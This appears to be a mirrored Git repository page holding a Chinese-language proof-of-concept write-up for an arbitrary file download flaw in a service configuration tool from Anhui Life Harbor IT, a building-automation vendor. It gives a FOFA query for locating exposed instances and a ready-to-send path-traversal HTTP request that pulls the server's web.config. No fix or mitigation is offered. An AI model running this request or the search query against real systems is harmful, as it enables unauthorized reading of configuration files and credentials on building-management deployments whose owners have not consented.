crazywhalecc/POC00
1
0
Fork 0
mirror of https://github.com/wooluo/POC00.git synced 2026-03-17 21:04:50 +08:00
Code Issues Packages Projects Releases Wiki Activity
POC00/安徽生命港湾信息技术有限公司服务配置工具存在任意文件下载漏洞.md
zhangliang01 d6f5e3efe6 20250402 update
2025-04-02 22:36:18 +08:00

33 lines
1.9 KiB
Markdown
Raw Permalink Blame History

This file contains ambiguous Unicode characters

This file contains Unicode characters that might be confused with other characters. If you think that this is intentional, you can safely ignore this warning. Use the Escape button to reveal them.

# 安徽生命港湾信息技术有限公司服务配置工具存在任意文件下载漏洞
# 一、漏洞简介
安徽生命港湾信息技术有限公司成立于2020年7月。以“产品+解决方案+服务”引领技术、运营模式创新是以楼宇自控产品BA)、软件平台(IBMS)、数字建筑、物联网系统(AIoT)为核心技术驱动的创新型技术企业致力于智慧建筑、物联网系统产品研发、制造产品涵盖IBMS平台软件、边缘计算网关、物联网数据中台、楼宇自控设备、执行器、传感器等。凭借技术团队多年的行业耕耘及深入场景的产品设计和创新以IBMS为可视化运维管理平台将物联网数据采集、大数据与IBMS融合实现安防、医疗、楼宇自控、能源、园区、环境、城市、应急等智慧控制管理功能为医院、园区、教育、政务、轨道交通等行业提供智慧建筑全生态解决方案。安徽生命港湾信息技术有限公司服务配置工具存在任意文件下载漏洞
# 二、影响版本
+ 服务配置工具
# 三、资产测绘
+ fofa`body="css/markdown.css" && body="icon-512.png"`
+ 特征
![1733591983248-8301dd73-b583-47cd-aacc-864c5214c282.png](./img/PNMBjNOeHcnDPE9f/1733591983248-8301dd73-b583-47cd-aacc-864c5214c282-414402.png)
# 四、漏洞复现
```java
GET /api/File/Download?file=../web.config HTTP/1.1
Host:
Priority: u=0, i
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:133.0) Gecko/20100101 Firefox/133.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Upgrade-Insecure-Requests: 1
```
![1733592027293-51775f39-1fc6-48dc-8b13-194bf5dba413.png](./img/PNMBjNOeHcnDPE9f/1733592027293-51775f39-1fc6-48dc-8b13-194bf5dba413-711997.png)
> 更新: 2024-12-20 14:53:54
> 原文: <https://www.yuque.com/xiaokp7/ocvun2/zd3swwh4v3saweol>
Reference in New Issue View Git Blame Copy Permalink